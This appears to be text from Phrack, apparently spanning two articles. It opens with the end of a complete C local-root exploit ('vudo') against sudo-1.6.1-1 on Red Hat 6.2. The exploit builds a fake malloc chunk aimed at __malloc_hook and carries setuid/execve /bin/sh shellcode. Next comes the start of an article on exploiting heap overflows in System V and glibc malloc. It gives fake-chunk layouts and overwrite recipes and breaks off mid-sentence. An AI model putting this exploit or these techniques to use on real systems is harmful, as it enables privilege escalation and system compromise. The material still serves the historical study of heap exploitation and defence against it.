"MaXX" Kaempf * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or (at * your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 * USA */ #include #include #include #include #include #include #include #include typedef struct malloc_chunk { size_t prev_size; size_t size; struct malloc_chunk * fd; struct malloc_chunk * bk; } * mchunkptr; #define SIZE_SZ sizeof(size_t) #define MALLOC_ALIGNMENT ( SIZE_SZ + SIZE_SZ ) #define MALLOC_ALIGN_MASK ( MALLOC_ALIGNMENT - 1 ) #define MINSIZE sizeof(struct malloc_chunk) /* shellcode */ #define sc \ /* jmp */ \ "\xeb\x0appssssffff" \ /* setuid */ \ "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" \ /* setgid */ \ "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" \ /* execve */ \ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \ "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \ "\x80\xe8\xdc\xff\xff\xff/bin/sh" #define MAX_UID_T_LEN 10 #define MAXSYSLOGLEN 960 #define IFCONF_BUF r2s( 8200 ) #define SUDOERS_FP r2s( 176 ) #define VASPRINTF r2s( 6300 ) #define VICTIM_SIZE r2s( 1500 ) #define SUDO "/usr/bin/sudo" #define USER_CWD "/" #define MESSAGE 19 /* "command not allowed" or "user NOT in sudoers" */ #define USER_ARGS ( VASPRINTF-VICTIM_SIZE-SIZE_SZ - 1 - (MAXSYSLOGLEN+1) ) #define PREV_SIZE 0x5858614d #define SIZE r2s( 192 ) #define SPACESPACE 0x08072020 #define POST_PS1 ( r2s(16) + r2s(640) + r2s(400) ) #define BK ( SPACESPACE - POST_PS1 + SIZE_SZ - sizeof(sc) ) #define STACK ( 0xc0000000 - 4 ) #define PRE_SHELL "SHELL=" #define MAXPATHLEN 4095 #define SHELL ( MAXPATHLEN - 1 ) #define PRE_SUDO_PS1 "SUDO_PS1=" #define PRE_TZ "TZ=" #define LIBC "/lib/libc.so.6" #define TZ_FIRST ( MINSIZE - SIZE_SZ - 1 ) #define TZ_STEP ( MALLOC_ALIGNMENT / sizeof(char) ) #define TZ_LAST ( 0x10000 - SIZE_SZ - 1 ) #define POST_IFCONF_BUF (r2s(1600)+r2s(40)+r2s(16386)+r2s(3100)+r2s(6300)) #define ENVP_FIRST ( ((POST_IFCONF_BUF - SIZE_SZ) / sizeof(char *)) - 1 ) #define ENVP_STEP ( MALLOC_ALIGNMENT / sizeof(char *) ) /* request2size() */ size_t r2s( size_t request ) { size_t size; size = request + ( SIZE_SZ + MALLOC_ALIGN_MASK ); if ( size < (MINSIZE + MALLOC_ALIGN_MASK) ) { size = MINSIZE; } else { size &= ~MALLOC_ALIGN_MASK; } return( size ); } /* nul() */ int nul( size_t size ) { char * p = (char *)( &size ); if ( p[0] == '\0' || p[1] == '\0' || p[2] == '\0' || p[3] == '\0' ) { return( -1 ); } return( 0 ); } /* nul_or_space() */ int nul_or_space( size_t size ) { char * p = (char *)( &size ); if ( p[0] == '\0' || p[1] == '\0' || p[2] == '\0' || p[3] == '\0' ) { return( -1 ); } if ( p[0] == ' ' || p[1] == ' ' || p[2] == ' ' || p[3] == ' ' ) { return( -1 ); } return( 0 ); } typedef struct vudo_s { /* command line */ size_t __malloc_hook; size_t tz; size_t envp; size_t setenv; size_t msg; size_t buf; size_t NewArgv; /* execve */ char ** execve_argv; char ** execve_envp; } vudo_t; /* vudo_setenv() */ size_t vudo_setenv( uid_t uid ) { struct passwd * pw; size_t setenv; char idstr[ MAX_UID_T_LEN + 1 ]; /* pw */ pw = getpwuid( uid ); if ( pw == NULL ) { return( 0 ); } /* SUDO_COMMAND */ setenv = r2s( 16 ); /* SUDO_USER */ setenv += r2s( strlen("SUDO_USER=") + strlen(pw->pw_name) + 1 ); setenv += r2s( 16 ); /* SUDO_UID */ sprintf( idstr, "%ld", (long)(pw->pw_uid) ); setenv += r2s( strlen("SUDO_UID=") + strlen(idstr) + 1 ); setenv += r2s( 16 ); /* SUDO_GID */ sprintf( idstr, "%ld", (long)(pw->pw_gid) ); setenv += r2s( strlen("SUDO_GID=") + strlen(idstr) + 1 ); setenv += r2s( 16 ); return( setenv ); } /* vudo_msg() */ size_t vudo_msg( vudo_t * p_v ) { size_t msg; msg = ( MAXSYSLOGLEN + 1 ) - strlen( "shell " ) + 3; msg *= sizeof(char *); msg += SIZE_SZ - IFCONF_BUF + p_v->setenv + SUDOERS_FP + VASPRINTF; msg /= sizeof(char *) + 1; return( msg ); } /* vudo_buf() */ size_t vudo_buf( vudo_t * p_v ) { size_t buf; buf = VASPRINTF - VICTIM_SIZE - p_v->msg; return( buf ); } /* vudo_NewArgv() */ size_t vudo_NewArgv( vudo_t * p_v ) { size_t NewArgv; NewArgv = IFCONF_BUF-VICTIM_SIZE-p_v->setenv-SUDOERS_FP-p_v->buf; return( NewArgv ); } /* vudo_execve_argv() */ char ** vudo_execve_argv( vudo_t * p_v ) { size_t pudding; char ** execve_argv; char * p; char * user_tty; size_t size; char * user_runas; int i; char * user_args; /* pudding */ pudding = ( (p_v->NewArgv - SIZE_SZ) / sizeof(char *) ) - 3; /* execve_argv */ execve_argv = malloc( (4 + pudding + 2) * sizeof(char *) ); if ( execve_argv == NULL ) { return( NULL ); } /* execve_argv[ 0 ] */ execve_argv[ 0 ] = SUDO; /* execve_argv[ 1 ] */ execve_argv[ 1 ] = "-s"; /* execve_argv[ 2 ] */ execve_argv[ 2 ] = "-u"; /* user_tty */ if ( (p = ttyname(STDIN_FILENO)) || (p = ttyname(STDOUT_FILENO)) ) { if ( strncmp(p, _PATH_DEV, sizeof(_PATH_DEV) - 1) == 0 ) { p += sizeof(_PATH_DEV) - 1; } user_tty = p; } else { user_tty = "unknown"; } /* user_cwd */ if ( chdir(USER_CWD) == -1 ) { return( NULL ); } /* user_runas */ size = p_v->msg; size -= MESSAGE; size -= strlen( " ; TTY= ; PWD= ; USER= ; COMMAND=" ); size -= strlen( user_tty ); size -= strlen( USER_CWD ); user_runas = malloc( size + 1 ); if ( user_runas == NULL ) { return( NULL ); } memset( user_runas, 'M', size ); user_runas[ size ] = '\0'; /* execve_argv[ 3 ] */ execve_argv[ 3 ] = user_runas; /* execve_argv[ 4 ] .. execve_argv[ (4 + pudding) - 1 ] */ for ( i = 4; i < 4 + pudding; i++ ) { execve_argv[ i ] = ""; } /* user_args */ user_args = malloc( USER_ARGS + 1 ); if ( user_args == NULL ) { return( NULL ); } memset( user_args, 'S', USER_ARGS ); user_args[ USER_ARGS ] = '\0'; /* execve_argv[ 4 + pudding ] */ execve_argv[ 4 + pudding ] = user_args; /* execve_argv[ (4 + pudding) + 1 ] */ execve_argv[ (4 + pudding) + 1 ] = NULL; return( execve_argv ); } /* vudo_execve_envp() */ char ** vudo_execve_envp( vudo_t * p_v ) { size_t fd; char * chunk; size_t post_pudding; int i; size_t pudding; size_t size; char * post_chunk; size_t p_chunk; char * shell; char * p; char * sudo_ps1; char * tz; char ** execve_envp; size_t stack; /* fd */ fd = p_v->__malloc_hook - ( SIZE_SZ + SIZE_SZ + sizeof(mchunkptr) ); /* chunk */ chunk = malloc( MINSIZE + 1 ); if ( chunk == NULL ) { return( NULL ); } ( (mchunkptr)chunk )->prev_size = PREV_SIZE; ( (mchunkptr)chunk )->size = SIZE; ( (mchunkptr)chunk )->fd = (mchunkptr)fd; ( (mchunkptr)chunk )->bk = (mchunkptr)BK; chunk[ MINSIZE ] = '\0'; /* post_pudding */ post_pudding = 0; for ( i = 0; i < MINSIZE + 1; i++ ) { if ( chunk[i] == '\0' ) { post_pudding += 1; } } /* pudding */ pudding = p_v->envp - ( 3 + post_pudding + 2 ); /* post_chunk */ size = ( SIZE - 1 ) - 1; while ( nul(STACK - sizeof(SUDO) - (size + 1) - (MINSIZE + 1)) ) { size += 1; } post_chunk = malloc( size + 1 ); if ( post_chunk == NULL ) { return( NULL ); } memset( post_chunk, 'Y', size ); post_chunk[ size ] = '\0'; /* p_chunk */ p_chunk = STACK - sizeof(SUDO) - (strlen(post_chunk)+1) - (MINSIZE+1); /* shell */ shell = malloc( strlen(PRE_SHELL) + SHELL + 1 ); if ( shell == NULL ) { return( NULL ); } p = shell; memcpy( p, PRE_SHELL, strlen(PRE_SHELL) ); p += strlen( PRE_SHELL ); while ( p < shell + strlen(PRE_SHELL) + (SHELL & ~(SIZE_SZ-1)) ) { *((size_t *)p) = p_chunk; p += SIZE_SZ; } while ( p < shell + strlen(PRE_SHELL) + SHELL ) { *(p++) = '2'; } *p = '\0'; /* sudo_ps1 */ size = p_v->buf; size -= POST_PS1 + VICTIM_SIZE; size -= strlen( "PS1=" ) + 1 + SIZE_SZ; sudo_ps1 = malloc( strlen(PRE_SUDO_PS1) + size + 1 ); if ( sudo_ps1 == NULL ) { return( NULL ); } memcpy( sudo_ps1, PRE_SUDO_PS1, strlen(PRE_SUDO_PS1) ); memset( sudo_ps1 + strlen(PRE_SUDO_PS1), '0', size + 1 - sizeof(sc) ); strcpy( sudo_ps1 + strlen(PRE_SUDO_PS1) + size + 1 - sizeof(sc), sc ); /* tz */ tz = malloc( strlen(PRE_TZ) + p_v->tz + 1 ); if ( tz == NULL ) { return( NULL ); } memcpy( tz, PRE_TZ, strlen(PRE_TZ) ); memset( tz + strlen(PRE_TZ), '0', p_v->tz ); tz[ strlen(PRE_TZ) + p_v->tz ] = '\0'; /* execve_envp */ execve_envp = malloc( p_v->envp * sizeof(char *) ); if ( execve_envp == NULL ) { return( NULL ); } /* execve_envp[ p_v->envp - 1 ] */ execve_envp[ p_v->envp - 1 ] = NULL; /* execve_envp[3+pudding] .. execve_envp[(3+pudding+post_pudding)-1] */ p = chunk; for ( i = 3 + pudding; i < 3 + pudding + post_pudding; i++ ) { execve_envp[ i ] = p; p += strlen( p ) + 1; } /* execve_envp[ 3 + pudding + post_pudding ] */ execve_envp[ 3 + pudding + post_pudding ] = post_chunk; /* execve_envp[ 0 ] */ execve_envp[ 0 ] = shell; /* execve_envp[ 1 ] */ execve_envp[ 1 ] = sudo_ps1; /* execve_envp[ 2 ] */ execve_envp[ 2 ] = tz; /* execve_envp[ 3 ] .. execve_envp[ (3 + pudding) - 1 ] */ i = 3 + pudding; stack = p_chunk; while ( i-- > 3 ) { size = 0; while ( nul_or_space(stack - (size + 1)) ) { size += 1; } if ( size == 0 ) { execve_envp[ i ] = ""; } else { execve_envp[ i ] = malloc( size + 1 ); if ( execve_envp[i] == NULL ) { return( NULL ); } memset( execve_envp[i], '1', size ); ( execve_envp[ i ] )[ size ] = '\0'; } stack -= size + 1; } return( execve_envp ); } /* usage() */ void usage( char * fn ) { printf( "%s versus Red Hat Linux/Intel 6.2 (Zoot) sudo-1.6.1-1\n", fn ); printf( "Copyright (C) 2001 Michel \"MaXX\" Kaempf \n" ); printf( "\n" ); printf( "* Usage: %s __malloc_hook tz envp\n", fn ); printf( "\n" ); printf( "* Example: %s 0x002501dc 62595 6866\n", fn ); printf( "\n" ); printf( "* __malloc_hook:\n" ); printf( " $ LD_TRACE_LOADED_OBJECTS=1 %s | grep %s\n", SUDO, LIBC ); printf( " $ objdump --syms %s | grep __malloc_hook\n", LIBC ); printf( " $ nm %s | grep __malloc_hook\n", LIBC ); printf( "\n" ); printf( "* tz:\n" ); printf( " - first: %u\n", TZ_FIRST ); printf( " - step: %u\n", TZ_STEP ); printf( " - last: %u\n", TZ_LAST ); printf( "\n" ); printf( "* envp:\n" ); printf( " - first: %u\n", ENVP_FIRST ); printf( " - step: %u\n", ENVP_STEP ); } /* main() */ int main( int argc, char * argv[] ) { vudo_t vudo; /* argc */ if ( argc != 4 ) { usage( argv[0] ); return( -1 ); } /* vudo.__malloc_hook */ vudo.__malloc_hook = strtoul( argv[1], NULL, 0 ); if ( vudo.__malloc_hook == ULONG_MAX ) { return( -1 ); } /* vudo.tz */ vudo.tz = strtoul( argv[2], NULL, 0 ); if ( vudo.tz == ULONG_MAX ) { return( -1 ); } /* vudo.envp */ vudo.envp = strtoul( argv[3], NULL, 0 ); if ( vudo.envp == ULONG_MAX ) { return( -1 ); } /* vudo.setenv */ vudo.setenv = vudo_setenv( getuid() ); if ( vudo.setenv == 0 ) { return( -1 ); } /* vudo.msg */ vudo.msg = vudo_msg( &vudo ); /* vudo.buf */ vudo.buf = vudo_buf( &vudo ); /* vudo.NewArgv */ vudo.NewArgv = vudo_NewArgv( &vudo ); /* vudo.execve_argv */ vudo.execve_argv = vudo_execve_argv( &vudo ); if ( vudo.execve_argv == NULL ) { return( -1 ); } /* vudo.execve_envp */ vudo.execve_envp = vudo_execve_envp( &vudo ); if ( vudo.execve_envp == NULL ) { return( -1 ); } /* execve */ execve( (vudo.execve_argv)[0], vudo.execve_argv, vudo.execve_envp ); return( -1 ); } <--> --[ 5 - Acknowledgements ]---------------------------------------------- Thanks to Todd Miller for the fascinating vulnerability, thanks to Chris Wilson for the vulnerability discovery, thanks to Doug Lea for the excellent allocator, and thanks to Solar Designer for the unlink() technique. Thanks to Synnergy for the invaluable support, the various operating systems, and the great patience... thanks for everything. Thanks to VIA (and especially to BBP and Kaliban) and thanks to the eXperts group (and particularly to Fred and Nico) for the careful (painful? :) rereading. Thanks to the antiSecurity movement (and peculiarly to JimJones and Portal) for the interesting discussions of disclosure issues. Thanks to MasterSecuritY since my brain worked unconsciously on the Sudo vulnerability during work time :) Thanks to Phrack for the professional work, and greets to superluck ;) --[ 6 - Outroduction ]-------------------------------------------------- I stand up next to a mountain and chop it down with the edge of my hand. -- Jimi Hendrix (Voodoo Chile (slight return)) The voodoo, who do, what you don't dare do people. -- The Prodigy (Voodoo People) I do Voodoo, but not on You -- efnet.vuurwerk.nl |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x09 of 0x12 |=---------------------=[ Once upon a free()... ]=-----------------------=| |=-----------------------------------------------------------------------=| |=--------------=[ anonymous ]=-------------=| On the Unix system, and later in the C standard library there are functions to handle variable amounts of memory in a dynamic way. This allows programs to dynamically request memory blocks from the system. The operating system only provides a very rough system call 'brk' to change the size of a big memory chunk, which is known as the heap. On top of this system call the malloc interface is located, which provides a layer between the application and the system call. It can dynamically split the large single block into smaller chunks, free those chunks on request of the application and avoid fragmentation while doing so. You can compare the malloc interface to a linear file system on a large, but dynamically sized raw device. There are a few design goals which have to be met by the malloc interface: - stability - performance - avoidance of fragmentation - low space overhead There are only a few common malloc implementations. The most common ones are the System V one, implemented by AT&T, the GNU C Library implementation and the malloc-similar interface of the Microsoft operating systems (RtlHeap*). Here is a table of algorithms and which operating systems use them: Algorithm | Operating System ------------------------+-------------------------------------------------- BSD kingsley | 4.4BSD, AIX (compatibility), Ultrix BSD phk | BSDI, FreeBSD, OpenBSD GNU Lib C (Doug Lea) | Hurd, Linux System V AT&T | Solaris, IRIX Yorktown | AIX (default) RtlHeap* | Microsoft Windows * ------------------------+-------------------------------------------------- It is interesting to see that most of the malloc implementations are very easy to port and that they are architecture independent. Most of those implementations just build an interface with the 'brk' system call. You can change this behaviour with a #define. All of the implementations I have come across are written in ANSI C and just do very minimal or even no sanity checking. Most of them have a special compilation define that includes asserts and extra checks. Those are turned off by default in the final build for performance reasons. Some of the implementations also offer extra reliability checks that will detect buffer overflows. Those are made to detect overflows while development, not to stop exploitation in the final release. Storing management info in-band Most malloc implementations share the behaviour of storing their own management information, such as lists of used or free blocks, sizes of memory blocks and other useful data within the heap space itself. Since the whole idea of malloc/free is based on the dynamic requirements the application has, the management info itself occupies a variable amount of data too. Because of this, the implementation can seldomly just reserve a certain amount of memory for its own purposes, but stores the management information "in-band", right after and before the blocks of memory that are used by the application. Some applications do request a block of memory using the malloc interface, which later happens to be vulnerable to a buffer overflow. This way, the data behind the chunk can be changed. Possibly the malloc management structures can be compromised. This has been demonstrated first by Solar Designer's wizard-like exploit [1]. The central attack of exploiting malloc allocated buffer overflows is to modify this management information in a way that will allow arbitrary memory overwrites afterwards. This way pointers can be overwritten within the writeable process memory, hence allowing modification of return addresses, linkage tables or application level data. To mount such an attack, we have to take a deep look within the internal workings of the implementation we want to exploit. This article discusses the commonly used GNU C Library and the System V implementation and how to gain control over a process using buffer overflows which occur in malloced buffers under Linux, Solaris and IRIX systems. System V malloc implementation ============================== IRIX and Solaris use an implementation which is based on self-adjusting binary trees. The theoretical background of this implementation has been described in [2]. The basic idea of this implementation is to keep lists of equally sized malloc chunks within a binary tree. If you allocate two chunks of the same size, they will be within the same node and within the same list of this node. The tree is ordered by the size of its elements. The TREE structure The definition of the TREE structure can be found in the mallint.h, along with some easy-to-use macros to access its elements. The mallint.h file can be found in the source distribution of the Solaris operating system [4]. Although I cannot verify that IRIX is based on the same source, there are several similarities which indicated this. The malloc interface internally creates the same memory layout and functions, besides some 64 bit alignments. You can utilize the Solaris source for your IRIX exploits, too. To allow each tree element to be used for a different purpose to avoid overhead and force an alignment, each TREE structure element is defined as a union: /* the proto-word; size must be ALIGN bytes */ typedef union _w_ { size_t w_i; /* an unsigned int */ struct _t_ *w_p; /* a pointer */ char w_a[ALIGN]; /* to force size */ } WORD; Central TREE structure definition: /* structure of a node in the free tree */ typedef struct _t_ { WORD t_s; /* size of this element */ WORD t_p; /* parent node */ WORD t_l; /* left child */ WORD t_r; /* right child */ WORD t_n; /* next in link list */ WORD t_d; /* dummy to reserve space for self-pointer */ } TREE; The 't_s' element of the chunk header contains the rounded up value of the size the user requested when he called malloc. Since this size is always rounded up to a word boundary, at least the lower two bits of the 't_s' elements are unused - they normally would have the value of zero all the time. Instead of being zero, they are ignored for all size-related operations. They are used as flag elements. From the malloc.c source it reads: BIT0: 1 for busy (block is in use), 0 for free. BIT1: if the block is busy, this bit is 1 if the preceding block in contiguous memory is free. Otherwise, it is always 0. TREE Access macros: /* usable # of bytes in the block */ #define SIZE(b) (((b)->t_s).w_i) /* free tree pointers */ #define PARENT(b) (((b)->t_p).w_p) #define LEFT(b) (((b)->t_l).w_p) #define RIGHT(b) (((b)->t_r).w_p) /* forward link in lists of small blocks */ #define AFTER(b) (((b)->t_p).w_p) /* forward and backward links for lists in the tree */ #define LINKFOR(b) (((b)->t_n).w_p) #define LINKBAK(b) (((b)->t_p).w_p) For all allocation operations a certain alignment and minimum size is enforced, which is defined here: #define WORDSIZE (sizeof (WORD)) #define MINSIZE (sizeof (TREE) - sizeof (WORD)) #define ROUND(s) if (s % WORDSIZE) s += (WORDSIZE - (s % WORDSIZE)) The tree structure is the central element of each allocated chunk. Normally only the 't_s' and 't_p' elements are used, and user data is stored from 't_l' on. Once the node is freed, this changes and the data is reused to manage the free elements more efficiently. The chunk represents an element within the splay tree. As more chunks get freed, the malloc implementation tries to merge the free chunks right next to it. At most FREESIZE (32 by default) chunks can be in this dangling free state at the same time. They are all stored within the 'flist' array. If a call to free is made while the list is already full, the old element at this place falls out and is forwarded to realfree. The place is then occupied by the newly freed element. This is done to speed up and avoid defragmentation in cases where a lot of calls to free are made in a row. The real merging process is done by realfree. It inserts the chunk into the central tree, which starts at the 'Root' pointer. The tree is ordered by the size of its elements and is self-balancing. It is a so called "splay tree", in which the elements cycle in a special way to speed up searches (see google.com "splay tree" for further information). This is not much of importance here, but keep in mind that there are two stages of free chunks: one being within the flist array, and one within the free-elements tree starting at 'Root'. There are some special management routines for allocating small chunks of memory, which happen to have a size below 40 bytes. Those are not considered here, but the basic idea is to have extra lists of them, not keeping them within a tree but in lists, one for each WORD matching size below 40. There is more than one way to exploit a malloc based buffer overflow, however here is one method which works against both, IRIX and Solaris. As a chunk is realfree'd, it is checked whether the neighbor-chunks are already within the realfree'd tree. If it is the case, the only thing that has to be done is to logically merge the two chunks and reorder its position within the tree, as the size has changed. This merging process involves pointer modification within the tree, which consists of nodes. These nodes are represented by the chunk header itself. Pointers to other tree elements are stored there. If we can overwrite them, we can possibly modify the operation when merging the chunks. Here is, how it is done in malloc.c: (modified to show the interesting part of it) static void realfree(void *old) { TREE *tp, *sp, *np; size_t ts, size; /* pointer to the block */ tp = BLOCK(old); ts = SIZE(tp); if (!ISBIT0(ts)) return; CLRBITS01(SIZE(tp)); /* see if coalescing with next block is warranted */ np = NEXT(tp); if (!ISBIT0(SIZE(np))) { if (np != Bottom) t_delete(np); SIZE(tp) += SIZE(np) + WORDSIZE; } We remember NEXT points to the chunk directly following the current one. So we have this memory layout: tp old np | | | [chunk A header] [chunk A data] | [chunk B or free ....] | chunk boundary In the usual situation the application has allocated some space and got a pointer (old) from malloc. It then messes up and allows a buffer overflow of the chunk data. We cross the chunk boundary by overflowing and hit the data behind, which is either free space or another used chunk. np = NEXT(tp); Since we can only overflow data behind 'old', we cannot modify the header of our own chunk. Therefore we cannot influence the 'np' pointer in any way. It always points to the chunk boundary. Now a check is made to test if it is possible to merge forward, that is our chunk and the chunk behind it. Remember that we can control the chunk to the right of us. if (!ISBIT0(SIZE(np))) { if (np != Bottom) t_delete(np); SIZE(tp) += SIZE(np) + WORDSIZE; } BIT0 is zero if the chunk is free and within the free elements tree. So if it is free and not the last chunk, the special 'Bottom' chunk, it is deleted from the tree. Then the sizes of both chunks are added and later in the code of the realfree function the whole resized chunk is reinserted into the tree. One important part is that the overflowed chunk must not be the last chunk within the malloc space, condition: 1. Overflowed chunk must not be the last chunk Here is how the 't_delete' function works: static void t_delete(TREE *op) { TREE *tp, *sp, *gp; /* if this is a non-tree node */ if (ISNOTREE(op)) { tp = LINKBAK(op); if ((sp = LINKFOR(op)) != NULL) LINKBAK(sp) = tp; LINKFOR(tp) = sp; return; } There are other cases, but this is the one easiest to exploit. As I am already tired of this, I will just explain this one here. The others are very similar (look at malloc.c). ISNOTREE compares the 't_l' element of the TREE structure with -1. -1 is the special marker for non-tree nodes, which are used as doubly linked list, but that does not matter. Anyway, this is the first condition we have to obey: 2. fake->t_l = -1; Now the unlinking between FOR (t_n) and BAK (t_p) is done, which can be rewritten as: t1 = fake->t_p t2 = fake->t_n t2->t_p = t1 t1->t_n = t2 Which is (written in pseudo-raw-assignments which happen at the same time): [t_n + (1 * sizeof (WORD))] = t_p [t_p + (4 * sizeof (WORD))] = t_n This way we can write to arbitrary addresses together with valid addresses at the same time. We choose to use this: t_p = retloc - 4 * sizeof (WORD) t_n = retaddr This way retloc will be overwritten with retaddr and *(retaddr + 8) will be overwritten with retloc. If there is code at retaddr, there should be a small jump over the bytes 8-11 to not execute this address as code. Also, the addresses can be swapped if that fits the situation better. Finally our overwrite buffer looks like this: | | chunk boundary Where: t_s = some small size with lower two bits zeroed out t_p = retloc - 4 * sizeof (WORD) t_l = -1 t_r = junk t_n = retaddr t_d = junk Note that although all of the data is stored as 32 bit pointers, each structure element occupies eight bytes. This is because of the WORD union, which forces at least ALIGN bytes to be used for each element. ALIGN is defined to eight by default. So a real overflow buffer behind the chunk boundary might look like: ff ff ff f0 41 41 41 41 ef ff fc e0 41 41 41 41 | ....AAAA....AAAA ff ff ff ff 41 41 41 41 41 41 41 41 41 41 41 41 | ....AAAAAAAAAAAA ef ff fc a8 41 41 41 41 41 41 41 41 41 41 41 41 | ....AAAAAAAAAAAA All 'A' characters can be set arbitrarily. The 't_s' element has been replaced with a small negative number to avoid NUL bytes. If you want to use NUL bytes, use very few. Otherwise the realfree function will crash later. The buffer above will overwrite: [0xeffffce0 + 32] = 0xeffffca8 [0xeffffca8 + 8] = 0xeffffce0 See the example code (mxp.c) for a more in-depth explanation. To summarize down the guts if you happen to exploit a malloc based buffer overflow on IRIX or Solaris: 1. Create a fake chunk behind the one you overflow 2. The fake chunk is merged with the one you overflow as it is passed to realfree 3. To make it pass to realfree it has to call malloc() again or there have to be a lot of successive free() calls 4. The overflowed chunk must not be the last chunk (the one before Bottom) 5. Prepend the shellcode/nop-space with jump-aheads to not execute the unavoidable unlink-overwrite address as code 6. Using the t_splay routines attacks like this are possible too, so if you cannot use the attack described here (say you cannot write 0xff bytes), use the source luke. There are a lot of other ways to exploit System V malloc management, way more than there are available in the GNU implementation. This is a result of the dynamic tree structure, which also makes it difficult to understand sometimes. If you have read until here, I am sure you can find your own ways to exploit malloc based buffer overflows. GNU C Library implementation ============================ The GNU C library keeps the information about the memory slices the application requests in so called 'chunks'. They look like this (adapted from malloc.c): +----------------------------------+ chunk -> | prev_size | +----------------------------------+ | size | +----------------------------------+ mem -> | data | : ... : +----------------------------------+ nextchunk -> | prev_size ... | : : Where mem is the pointer you get as return value from malloc(). So if you do a: unsigned char * mem = malloc (16); Then 'mem' is equal to the pointer in the figure, and (mem - 8) would be equal to the 'chunk' pointer. The 'prev_size' element has a special function: If the chunk before the current one is unused (it was free'd), it contains the length of the chunk before. In the other case - the chunk before the current one is used - 'prev_size' is part of the 'data' of it, saving four bytes. The 'size' field has a special meaning. As you would expect, it contains the length of the current block of memory, the data section. As you call malloc(), four is added to the size you pass to it and afterwards the size is padded up to the next double-word boundary. So a malloc(7) will become a malloc(16), and a malloc(20) will become malloc(32). For malloc(0) it will be padded to malloc(8). The reason for this behaviour will be explained in the latter. Since this padding implies that the lower three bits are always zero and are not used for real length, they are used another way. They are used to indicate special attributes of the chunk. The lowest bit, called PREV_INUSE, indicates whether the previous chunk is used or not. It is set if the next chunk is in use. The second least significant bit is set if the memory area is mmap'ed -- a special case which we will not consider. The third least significant bit is unused. To test whether the current chunk is in use or not, we have to check the next chunk's PREV_INUSE bit within its size value. Once we free() the chunk, using free(mem), some checks take place and the memory is released. If its neighbour blocks are free, too (checked using the PREV_INUSE flag), they will be merged to keep the number of reuseable blocks low, but their sizes as large as possible. If a merge is not possible, the next chunk is tagged with a cleared PREV_INUSE bit, and the chunk changes a bit: +----------------------------------+ chunk -> | prev_size | +----------------------------------+ | size | +----------------------------------+ mem -> | fd | +----------------------------------+ | bk | +----------------------------------+ | (old memory, can be zero bytes) | : : nextchunk -> | prev_size ... | : : You can see that there are two new values, where our data was previously stored (at the 'mem' pointer). Those two values, called 'fd' and 'bk' - forward and backward, that is, are pointers. They point into a double linked list of unconsolidated blocks of free memory. Every time a new free is issued, the list will be checked, and possibly unconsolidated blocks are merged. The whole memory gets defragmented from time to time to release some memory. Since the malloc size is always at least 8 bytes, there is enough space for both pointers. If there is old data remaining behind the 'bk' pointer, it remains unused until it gets malloc'd again. The interesting thing regarding this management, is that the whole internal information is held in-band -- a clear channeling problem. (just as with format string commands within the string itself, as control channels in breakable phonelines, as return addresses within stack memory, etc). Since we can overwrite this internal management information if we can overwrite a malloced area, we should take a look at how it is processed later on. As every malloc'ed area is free()'d again in any sane program, we take a look at free, which is a wrapper to chunk_free() within malloc.c (simplified a bit, took out #ifdef's): static void chunk_free(arena *ar_ptr, mchunkptr p) { size_t hd = p->size; /* its head field */ size_t sz; /* its size */ int idx; /* its bin index */ mchunkptr next; /* next contiguous chunk */ size_t nextsz; /* its size */ size_t prevsz; /* size of previous contiguous chunk */ mchunkptr bck; /* misc temp for linking */ mchunkptr fwd; /* misc temp for linking */ int islr; /* track whether merging with last_remainder */ check_inuse_chunk(ar_ptr, p); sz = hd & ~PREV_INUSE; next = chunk_at_offset(p, sz); nextsz = chunksize(next); Since the malloc management keeps chunks within special structures called 'arenas', it is now tested whether the current chunk that should be free directly borders to the 'top' chunk -- a special chunk. The 'top' chunk is always the top-most available memory chunk within an arena, it is the border of the available memory. The whole if-block is not interesting for typical buffer overflows within the malloc space. if (next == top(ar_ptr)) /* merge with top */ { sz += nextsz; if (!(hd & PREV_INUSE)) /* consolidate backward */ { prevsz = p->prev_size; p = chunk_at_offset(p, -(long)prevsz); sz += prevsz; unlink(p, bck, fwd); } set_head(p, sz | PREV_INUSE); top(ar_ptr) = p; if ((unsigned long)(sz) >= (unsigned long)trim_threshold) main_trim(top_pad); return; } Now the 'size' of the current chunk is tested whether the previous chunk is unused (testing for the PREV_INUSE flag). If this is the case, both chunks are merged. islr = 0; if (!(hd & PREV_INUSE)) /* consolidate backward */ { prevsz = p->prev_size; p = chunk_at_offset(p, -(long)prevsz); sz += prevsz; if (p->fd == last_remainder(ar_ptr)) /* keep as last_remainder */ islr = 1; else unlink(p, bck, fwd); } Now the same is done vice versa. It is checked whether the chunk in front of the current chunk is free (testing for the PREV_INUSE flag of the size two chunks ahead). If this is the case the chunk is also merged into the current one. if (!(inuse_bit_at_offset(next, nextsz))) /* consolidate forward */ { sz += nextsz; if (!islr && next->fd == last_remainder(ar_ptr)) /* re-insert last_remainder */ { islr = 1; link_last_remainder(ar_ptr, p); } else unlink(next, bck, fwd); next = chunk_at_offset(p, sz); } else set_head(next, nextsz); /* clear inuse bit */ set_head(p, sz | PREV_INUSE); next->prev_size = sz; if (!islr) frontlink(ar_ptr, p, sz, idx, bck, fwd); } As Solar Designer showed us, it is possible to use the 'unlink' macro to overwrite arbitrary memory locations. Here is how to do: A usual buffer overflow situation might look like: mem = malloc (24); gets (mem); ... free (mem); This way the malloc'ed chunk looks like this: [ prev_size ] [ size P] [ 24 bytes ... ] (next chunk from now) [ prev_size ] [ size P] [ fd ] [ bk ] or [ data ... ] As you can see, the next chunk directly borders to our chunk we overflow. We can overwrite anything behind the data region of our chunk, including the header of the following chunk. If we take a closer look at the end of the chunk_free function, we see this code: if (!(inuse_bit_at_offset(next, nextsz))) /* consolidate forward */ { sz += nextsz; if (!islr && next->fd == last_remainder(ar_ptr)) /* re-insert last_remainder */ { islr = 1; link_last_remainder(ar_ptr, 